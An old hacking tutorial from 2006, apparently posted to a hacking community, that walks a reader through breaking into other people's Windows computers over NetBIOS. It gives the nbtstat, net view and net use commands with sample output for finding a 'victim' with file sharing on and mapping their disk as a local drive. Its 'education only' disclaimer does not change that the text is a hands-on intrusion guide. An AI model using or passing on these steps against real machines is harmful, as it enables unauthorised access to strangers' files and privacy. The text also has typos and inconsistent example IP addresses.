- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
NetBIOS Hacking
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

****  |  By g077ch4  | ****

============================
                 Sunday, August 20 , 2006
============================

Disclaimer:  I have written this here article for education purposes only.  Using NetNIOS is probably the easiest ways of hacking or rooting
someone remotly.  So if you go and get success on someone with NetBIOS, then FBI catches you.  Then this is your fault because this article
written for you to know in theory so whatever you do after reading this article was your choice no matter what.  So it is not my fault neither is it
enigma group's fault.

Chapters:

What Is NetBIOS

nbtstat

What do I need for this?

Types Of attacks

Hack Part One


==================================

What is NetBIOS?

NetBIOS was made by IBM and Sytek used for an application programming interface(API)  for client software for public access
NetBios stands for: Network-Basic-Input-Output System.NetBios is an API used by application programs on a PC LAN that uses
MS-DOS or some version of UNIX, providing application developers with a uniform set of commands for requesting lower-level
network services.  NetBIOS is also is a communication protocol used by Windows for communication on a LAN. When you browse
 the network neighborhood for other computers, netbios is involved.  Like any other service or API NetBIOS has been assigned to a
port number.  This is port number 139.NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various
information of the computers on a network . These Include:

1) Name of the computer

2) Username

3) Domain

4) Computer Name

5) and many others.



==================================

Nbtstat

Nbtstat is a command performed in command promt or MS-DOS.  You can reach any of these by going to start>run>cmd.  Or start>run>command.
And last but not least that I know of start>run>command.com.  But I just use cmd.  If you want more information on "nbtstat"  then go to MD-DOS or cmd
and type nbtstat and it drops a bunch of information that is very useful to your knowledge of Nbtstat and NetBIOS.  When you open cmd it should look like this:

C:\windows>

or for some people it might be

Microsoft Windows XP [Version ***]
<C> Copyright 1985-2001 Microsoft Crop.

C:\Documents and Settings\***>

Which ever is fine.  

==================================

Now we check if you enemy or target is vulnerable to NetBIOS hacking.  But before anything else you should first have their IP address.
Now open up cmd and type:

nbtstat -a ipaddress

Replace "ipaddess" with your targets ip address.  Now if you get this then it is not vulnerable:

Local Area Connection
Node IpAddress: [127.0.0.1] scope Id: []

Host not found.



==================================


But if you get something like this then it is vulnerable:

NetBIOS Remote Machine Name Table


Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6

Note the <20>.  It shows that the victim has enabled the file and printer sharing.  So other wise if the <20> isnt there then its also not vulnerable.

Next we will use cmd.  Type in the following:     net view \\127.0.0.1

If you get this then your good again:

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
CDISK Disk


The command completed successfully.
DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like



Shared resources at \\127.0.0.1


ComputerNameGoesHere

Share name Type Used as Comment
c:\windows>net use k: \\127.0.0.1\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k!  Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!